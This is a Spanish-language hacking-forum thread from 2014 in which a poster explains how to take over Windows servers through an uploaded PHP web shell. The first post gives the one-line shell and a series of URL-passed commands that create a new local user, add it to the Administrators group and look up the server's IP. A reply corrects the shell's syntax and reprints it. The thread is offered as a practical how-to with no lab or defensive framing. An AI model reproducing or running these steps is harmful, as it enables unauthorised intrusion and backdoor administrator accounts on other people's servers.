Underc0de

[In]Seguridad Informática => Bugs y Exploits => Pentesting => Mensaje iniciado por: Decode en Noviembre 23, 2014, 06:46:36 PM

Título: Elevar privilegios en servidores windows
Publicado por: Decode en Noviembre 23, 2014, 06:46:36 PM
Hola gente, aquí les vengo a enseñar como elevar privilegios en servidores windows.

1- Bueno primero necesitan tener subida una shell a una web o host.
2- Después tener un archivo shell server windows subido en la web o host.

El código que insertaremos es este:

Código (php) [Seleccionar]
<?php system($_GET['cmd']); ?>

Ya con el archivo subido van al link website.com/archivo.php?cmd=whoami y les tiene que aparecer NT
AUTORITHY/SYSTEM si no les sale nada o les sale NT es porque no tiene servidor vps la web o host.

Ya realizado lo anterior ahora ponemos: website.com/archivo.php?cmd=net user para ver los usuarios que tiene el servidor VPS.

Ya que hecho esto, ponemos: website.com/archivo.php?cmd=net user (NOMBRE DEL USUARIO QUE VAN A CREAR) (CONTRASEÑA QUE VAN A PONERLE) /add esto es para crear el usuario, sin los paréntesis.

Bueno ya hecho esto nos aparecerá (THE COMMAND COMPLETED SUCCESSFULLY) y hacemos lo siguiente: website.com/archivo.php?cmd=net user para ver nuestro usuario añadido si no sale es que hicieron algo mal.

Ahora hacemos esto: website.com/archivo.php?cmd=net localgroup Administrators (NOMBRE DEL USUARIO QUE HAN CREADO) /add y tiene que salir (THE COMMAND COMPLETED SUCCESSFULLY) esto es para darnos privilegios de Administrador en el servidor vps, sin los paréntesis.

Ahora para saber la IP del servidor VPS ponemos: website.com.com/archivo.php?cmd=ipconfig

Ya hecho todos estos pasos, podremos acceder al servidor vps como un Administrador.

Saludos.
Título: Re:Rootear Servidores VPS
Publicado por: q3rv0 en Noviembre 23, 2014, 07:41:14 PM
Un par de cosas

El titulo mas bien tendria que ser "Elevar privilegios en servidores windows", por que da lo mismo que sea un  vps o un server compartido, etc. No todos los vps usan win.

Aca tenes error de sintaxis

Citar- El archivo es este : <? php system  $_GET[cmd]); ?>

seria
Código (php) [Seleccionar]

<?php system($_GET['cmd']); ?>


Citar- Ya con el archivo subido van al link website.com/archivo.php?cmd=whoami y les tiene que aparecer algo así nt autorythy/system nt. O cualquiera parecido si no les sale nada o les sale nt es porque no tiene vps la página web.

Sos NT AUTHORITY\SYSTEM y queres rootear?? si ya tenes los maximos privs.

Citarsi no les sale nada o les sale nt es porque no tiene vps la página web

O_O

Averigua sobre los temas que remarque y corregi el post por favor.